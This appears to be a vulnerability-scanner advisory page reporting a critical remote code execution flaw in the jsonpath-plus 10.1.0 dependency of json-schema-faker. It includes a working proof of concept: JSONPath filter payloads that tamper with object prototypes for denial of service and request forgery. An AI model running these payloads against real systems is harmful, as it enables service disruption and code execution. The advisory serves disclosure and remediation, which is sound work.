Vulnerabilities

1 via 1 paths

Dependencies

12

Source

GitHub

Commit

7446c2f4

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

critical severity

Remote Code Execution (RCE)

  • Vulnerable module: jsonpath-plus
  • Introduced through: jsonpath-plus@10.1.0

Detailed paths

  • Introduced through: json-schema-faker@json-schema-faker/json-schema-faker#7446c2f464e04723d7a1f3578684935b5e6f3602 jsonpath-plus@10.1.0

Overview

jsonpath-plus is an A JS implementation of JSONPath with some additional operators

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.

Note:

There were several attempts to fix it in versions 10.0.0-10.1.0 but it could still be exploited using different payloads.

PoC

const { JSONPath } = require("jsonpath-plus");

const pathDoS =
  "$[?(con = constructor; dp = con.defineProperty; gopd = con.getOwnPropertyDescriptor; f = gopd(con, 'entries').value; alt = gopd(con.getPrototypeOf(f), 'apply'); dp(con.getPrototypeOf(_$_root.body), 'toString', alt);)]";
const pathSsrf =
  "$[?(con = constructor; dp = con.defineProperty; dp(con.prototype, 'referrer', _$_root.referrer); dp(con.prototype, 'method', _$_root.method); dp(con.prototype, 'body', _$_root.body);)]";

const result = JSONPath({
  json: {
    referrer: {
      value: "http://authorized.com",
      writable: true,
    },
    method: {
      value: "POST",
      writable: true,
    },
    body: {
      value: "Hello, World!",
      writable: true,
    },
  },
  path: pathDoS,
});

result.toString(); //DoS

//fetch("http://localhost:3000"); // ssrf with possible privilege escalation via lateral movement

Remediation

There is no fixed version for jsonpath-plus.

References